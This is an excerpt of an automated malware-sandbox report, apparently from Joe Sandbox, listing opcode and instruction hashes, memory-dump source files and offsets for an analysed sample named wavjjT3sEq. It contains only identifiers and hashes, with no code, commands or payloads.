                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a6fa5da78fb61e1c39112bb886cfd011408e15c3639d2f682f9839a621b60e4b
                                                                                                                                                              • Instruction ID: 1dadea8bea7e4c211a5c70a0175229615a36e6b0cfc4d01ba95ec40a5225eac0
                                                                                                                                                              • Opcode Fuzzy Hash: a6fa5da78fb61e1c39112bb886cfd011408e15c3639d2f682f9839a621b60e4b
                                                                                                                                                              • Instruction Fuzzy Hash: 43412330A08295AFDB14CF68C591ABAFBF1FF49700F0584ADD1C98B246C735A456DBA2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d655eb7817473ea5cbc222433ee69f382edfcbba70a5c60f91e7e8283ec90171
                                                                                                                                                              • Instruction ID: 9aee2e1a412ad77cd72499c7f4d326cfaf1213b143586f973795efd2f1739d62
                                                                                                                                                              • Opcode Fuzzy Hash: d655eb7817473ea5cbc222433ee69f382edfcbba70a5c60f91e7e8283ec90171
                                                                                                                                                              • Instruction Fuzzy Hash: 4F41FE36A80205CFDB21DF6CC994FED7BB4FB58B21F084569D41AAB380DB349901CBA0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e66bdd26bfd68f4d168a15281fb921df8fd8c466c58e2fc1e812e8497bd473c0
                                                                                                                                                              • Instruction ID: 954e18dd78572c58d497f4eef5a82f00f94fb145bf723606ac8f1cc28ee8c388
                                                                                                                                                              • Opcode Fuzzy Hash: e66bdd26bfd68f4d168a15281fb921df8fd8c466c58e2fc1e812e8497bd473c0
                                                                                                                                                              • Instruction Fuzzy Hash: D541F376A00212DBD729DF5CC880A6ABBF6FFD8B14F15812AD9099B359C735D842CB90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b3dd4bbee0d35d6096580249d31600f893324ddad63b0440d62323d70ed8b446
                                                                                                                                                              • Instruction ID: 3943369567e375a02fd7cf14f496586e44ad42f2b5337488512096bb013d749b
                                                                                                                                                              • Opcode Fuzzy Hash: b3dd4bbee0d35d6096580249d31600f893324ddad63b0440d62323d70ed8b446
                                                                                                                                                              • Instruction Fuzzy Hash: 3F415C3550874A9FD312DF69C840E6BF7E9AF84B54F40092AF988D7250E730DE458BA3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                              • Instruction ID: 042266078f01d427f22606362d6e3a60200a8c75766e88bd45e8a44f69f15bc4
                                                                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                              • Instruction Fuzzy Hash: CF419131A01259DFDB11FE2D8450BBABB75EF91B52F15806AE94E8B248D6378DC0C790
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: fad5598440f596735e4f6b25e8bc9f1e655cd96e10afe3cae31a6ac02b64acb2
                                                                                                                                                              • Instruction ID: 2c50ba6bc53e51e8c518f5334e258dee3feb7bd222848d3864c7acf4382f48ec
                                                                                                                                                              • Opcode Fuzzy Hash: fad5598440f596735e4f6b25e8bc9f1e655cd96e10afe3cae31a6ac02b64acb2
                                                                                                                                                              • Instruction Fuzzy Hash: A1417A71A00611EFD721DF18C840B26BBF8FF98315F688A6AE44DCB255E770E942CB90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                              • Instruction ID: 69804cc815621d9b301ee5f329749f3cff683c918301b5d9de1bc7eb215f7f3e
                                                                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                              • Instruction Fuzzy Hash: 80411971A00605EFDB65CF98C980EAABBF8FF58700B14496DEA5AE7650D330EA44CF50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: db9777beb2c400fdc56631630d0735661800170cc080870e153af71c8fc4df6b
                                                                                                                                                              • Instruction ID: 9f4dc83b832f0358ff6fbda4977163e7e5f9e2ca303cb0ec319d215b113b2921
                                                                                                                                                              • Opcode Fuzzy Hash: db9777beb2c400fdc56631630d0735661800170cc080870e153af71c8fc4df6b
                                                                                                                                                              • Instruction Fuzzy Hash: 5741D271505715CFCB22EF28C900B69B7F9FF94311F1486AAC81E9B2A9EB70A941CF51
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 703c6cd1eec5a651035c15d0a0b73f0edd783c3d03c24bc6d167aef09c0e2e7e
                                                                                                                                                              • Instruction ID: ee397afbf28779361caaffcd37805e53f611e92512b14f2c8a65e5e3882c1592
                                                                                                                                                              • Opcode Fuzzy Hash: 703c6cd1eec5a651035c15d0a0b73f0edd783c3d03c24bc6d167aef09c0e2e7e
                                                                                                                                                              • Instruction Fuzzy Hash: 45317AB1A00345DFDB51CFA8C440B99BBF4FF49715F2185AED519EB251D332A902CB90
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c9208d7ea6ea3cfcfacd54f99c46af6dc55ce254db2d17c99f910a5e05b28486
                                                                                                                                                              • Instruction ID: c18687ef227c980b8cd8a69797676786e0bfdfa72111e23e4393497992f0ae22
                                                                                                                                                              • Opcode Fuzzy Hash: c9208d7ea6ea3cfcfacd54f99c46af6dc55ce254db2d17c99f910a5e05b28486
                                                                                                                                                              • Instruction Fuzzy Hash: 134179729083019BD361DF29C845B9BBBE8FF88764F404A2EF99CD7291D7709905CB92
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
• Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
Yara matches
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 63b9d86ad6b46a45db6cb9f3537e4d3b0a56c9c30b59e486f987174da6eb8c63
                                                                                                                                                              • Instruction ID: 49df07c79e7c9d08e6a44f83aac0fb58b602b706e6d4907dc113fad80fa4feef
                                                                                                                                                              • Opcode Fuzzy Hash: 63b9d86ad6b46a45db6cb9f3537e4d3b0a56c9c30b59e486f987174da6eb8c63
                                                                                                                                                              • Instruction Fuzzy Hash: D3318C71A002049BCB24CF2DD885A4B7BE9FF9D340F418469EA08DF249D370E959CBA4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: dd9f8d7f9187de434ad07774d4f4dd60f0d165f3b4016e7ad95f547e0b1b7d7a
                                                                                                                                                              • Instruction ID: 28ea6cf62c4ea7bd965bfabcdbd5d6b2a6376577d2c05faaf0acf48c95489d9b
                                                                                                                                                              • Opcode Fuzzy Hash: dd9f8d7f9187de434ad07774d4f4dd60f0d165f3b4016e7ad95f547e0b1b7d7a
                                                                                                                                                              • Instruction Fuzzy Hash: F331B572E00219AFDB21DFAACC40EAEBBF8FF44750F114425E51AE7250D3749E008BA0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b328e35f1b6a677229330513fc3d70fe4f4e1fff446a1838772ba1b6b3c3dfd5
                                                                                                                                                              • Instruction ID: 81e9799cca2496362800ce05d8d28ad6d377d615630c015ed1247c11d6c78a54
                                                                                                                                                              • Opcode Fuzzy Hash: b328e35f1b6a677229330513fc3d70fe4f4e1fff446a1838772ba1b6b3c3dfd5
                                                                                                                                                              • Instruction Fuzzy Hash: FF310871A40216EFDB139F99C850B6EB7F9BF94315F00006DE509DB342DA70DD008790
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 960829c9ee9444edf359d4af1247795b4b5b88a75900026cbf5ff037f77f228c
                                                                                                                                                              • Instruction ID: 238d679c33cbe16836f3cbddf09c5387f8ad3c1f132f3cf9268d3d4c22d8d38c
                                                                                                                                                              • Opcode Fuzzy Hash: 960829c9ee9444edf359d4af1247795b4b5b88a75900026cbf5ff037f77f228c
                                                                                                                                                              • Instruction Fuzzy Hash: 83312776E04326DBC712DE288880E6BBBB5AFD4250F0A4928FC5D97318DA71DC0187E2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e9c50540b88ba37591344880d807a4b069853b8523732cca9e40a37037e1d050
                                                                                                                                                              • Instruction ID: 2523da99727b71768b2f8f45a5d21a8835a98f06a0b6bfc2d1f9f4de858c0a8a
                                                                                                                                                              • Opcode Fuzzy Hash: e9c50540b88ba37591344880d807a4b069853b8523732cca9e40a37037e1d050
                                                                                                                                                              • Instruction Fuzzy Hash: EF31AB726093119FE721DF19C840F2BBBE9FB88700F1449AEE9889B395D770E844CB91
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: ff0c64f427b9077940e6b3b1fe7b8324e6799950a610e9da091c44313f1dad44
                                                                                                                                                              • Instruction ID: ba0ba2db6172b81a9064655ef294613f45fb5b7d0d26bc2fc19e06f7f21476ed
                                                                                                                                                              • Opcode Fuzzy Hash: ff0c64f427b9077940e6b3b1fe7b8324e6799950a610e9da091c44313f1dad44
                                                                                                                                                              • Instruction Fuzzy Hash: 2F31CE72B10A265BD754CE3AD880656F7E2FB88310B548639D919C3B80E774F966CBD0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605416839.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1605402377.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_120000_wavjjT3sEq.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 862beb2b7f908d73e6b553ed97a7621fd60e6daf90d4181fb105b50fdff2e1db
                                                                                                                                                              • Instruction ID: e54a5f1d5d4a9f064eb6431cca15af1bca06c38335f03ef4d7c64bb4077bc859
                                                                                                                                                              • Opcode Fuzzy Hash: 862beb2b7f908d73e6b553ed97a7621fd60e6daf90d4181fb105b50fdff2e1db
                                                                                                                                                              • Instruction Fuzzy Hash: 0931B472A10A104FD378CF6ED845607F3E5EF88350B458A2DE86AD7B41D6B8E911CBC4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                              • Instruction ID: 535bacca0c28c84595a258e1ed3ff2c1f96a685dfcdc469b98aa43e60f901456
                                                                                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                                                                              • Instruction Fuzzy Hash: 64312BB2B00B01AFD761CF6EDD40B57BBF8BB48A50F04092DA99ED3650E630E900CB64
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 7732d93b184c6bdc6caa714e6edff064d20f7d434c8123a1d1dd04c2759eb342
                                                                                                                                                              • Instruction ID: 27b15368cd8670851ddae34401f1dce31c9d476f4caab83e952dab94f7b9df2b
                                                                                                                                                              • Opcode Fuzzy Hash: 7732d93b184c6bdc6caa714e6edff064d20f7d434c8123a1d1dd04c2759eb342
                                                                                                                                                              • Instruction Fuzzy Hash: 2231A9719493019FCB11DF19C54085ABFF5FF89A18F4849AEE48D9B251D330DA45CB92
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d4c93ec35c93bdb0728b1633beab2162f8d7e1e2c044bccca27214a20261bfe1
                                                                                                                                                              • Instruction ID: c6ce87f71df73ffe626dc8324b65139d3cb39040d7a3fb97c7f4aca3d29b8b3f
                                                                                                                                                              • Opcode Fuzzy Hash: d4c93ec35c93bdb0728b1633beab2162f8d7e1e2c044bccca27214a20261bfe1
                                                                                                                                                              • Instruction Fuzzy Hash: 2D31D431B002069FD724EFA9C981F6EBBF9BB84704F048529D54ED7254E730E946CB91
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                              • Instruction ID: 4d76bc0a713e2ae99760f366ca7ec2a5e04d34d9770f89cbb76fc613aa9c130b
                                                                                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                                                                              • Instruction Fuzzy Hash: A4210636E4125AAADB11DFB98801BAFBBB9AF54740F098435AE19E7340E274DD40C7A0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 10d7046e0c9897747b6c45b6556bed5f8aa5ace2240c296defa4b967b256ecd6
                                                                                                                                                              • Instruction ID: c6ffbc6e8b4927afa3f1370b12d21768eb7cdfb6d4e55819f91a58fac02160af
                                                                                                                                                              • Opcode Fuzzy Hash: 10d7046e0c9897747b6c45b6556bed5f8aa5ace2240c296defa4b967b256ecd6
                                                                                                                                                              • Instruction Fuzzy Hash: E2313BB15002119BD721AF58CC41BA9B7F8AFD0314F5485A9D98D9B386EA74E982CBA0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              • Opcode ID: 8fa95392537c2917aa0ae19b2326aca000bddab0a0465dde9281426954ad9652
                                                                                                                                                              • Instruction ID: 150e9732bc2ca27529e69bdffe019b37dd4b16c2983dacb8440de079669863dd
                                                                                                                                                              • Opcode Fuzzy Hash: 8fa95392537c2917aa0ae19b2326aca000bddab0a0465dde9281426954ad9652
                                                                                                                                                              • Instruction Fuzzy Hash: F121AC752406019FCB25DF29C800B4677F5BF88708F148468A90DCB762E775E842CB98
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b45847ab37963d9192e0cf8d8fbbb6f9efede2f3716a6d130c7093ef6fad83c8
                                                                                                                                                              • Instruction ID: 97540537c66f8ffa60394cbe805c8e0448b5d26cdd8d43fcaca52a1cb64a2701
                                                                                                                                                              • Opcode Fuzzy Hash: b45847ab37963d9192e0cf8d8fbbb6f9efede2f3716a6d130c7093ef6fad83c8
                                                                                                                                                              • Instruction Fuzzy Hash: FB112972380A15BFE72256999C01F2B769DDBD9B60F918428F70CDB290EB70EC118795
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: eabb6e27d8c6f5f0635e93fd5a19faf3fd65cada6d844f807027435b7642ee5b
                                                                                                                                                              • Instruction ID: eee951612284a540022fd28a40960ae1b0c778057e8d93c2b8040c282de4a955
                                                                                                                                                              • Opcode Fuzzy Hash: eabb6e27d8c6f5f0635e93fd5a19faf3fd65cada6d844f807027435b7642ee5b
                                                                                                                                                              • Instruction Fuzzy Hash: 8321E9B5E00219ABCB14DFAAD8859AEFBF8FF98710F10012EE409A7254D6749945CBA4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                              • Instruction ID: ae48d246dd7faa0a1c77024584b6d3b9de25e4dd2dff27bb06601a4c46ae386c
                                                                                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                              • Instruction Fuzzy Hash: E3216A72A0020AAFDB129F98CD80BEEBBB9FF88310F244859F908A7251D734D9508B50
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5dc4f9b17c206ced5335c9f755fc4e140571bbde9a41c0395c86a0cb182b7318
                                                                                                                                                              • Instruction ID: 50cd7b483f1f79105b66fad081cc08892f53f3f906dc17ccd6ee3a2970cda744
                                                                                                                                                              • Opcode Fuzzy Hash: 5dc4f9b17c206ced5335c9f755fc4e140571bbde9a41c0395c86a0cb182b7318
                                                                                                                                                              • Instruction Fuzzy Hash: EB21B133A108129B9B19CF3CC80446AF7E6EFCC31436A427AD916DB2A4D770B91187C4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                              • Instruction ID: ed742fba6897d65c6db02ee2f58370311c4d7f70fec67b853fa84c102510a6ee
                                                                                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                              • Instruction Fuzzy Hash: 5C11EF72600609BFE722DB48CC80F9ABBBCFB80754F140029FA09AB190E671ED44CB61
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5b16c83bb06826d4f5fb26e09091d30faa4b3ea9d1c2f24e668da4c4730b1e09
                                                                                                                                                              • Instruction ID: 5606557982059c1970ac52eb2966e9376c9f150c9ba3e2e877db65cbaeaf5ee1
                                                                                                                                                              • Opcode Fuzzy Hash: 5b16c83bb06826d4f5fb26e09091d30faa4b3ea9d1c2f24e668da4c4730b1e09
                                                                                                                                                              • Instruction Fuzzy Hash: 0A118F357016319BDB11CF4DC5C0A66BBEDAF9A751B19806DEE0CDF209D6B2E9018790
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_18f0000_wavjjT3sEq.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                              • Instruction ID: 8a2d72915d397c7b5382c18d6da4b68301a6e9e3a40646d56e60f0643b391cc4
                                                                                                                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                              • Instruction Fuzzy Hash: 9321AC72600601DFD775CF49C540E66BBEAEB98B11F108A3DE94DA7610D730EC00CB84
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1605784571.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
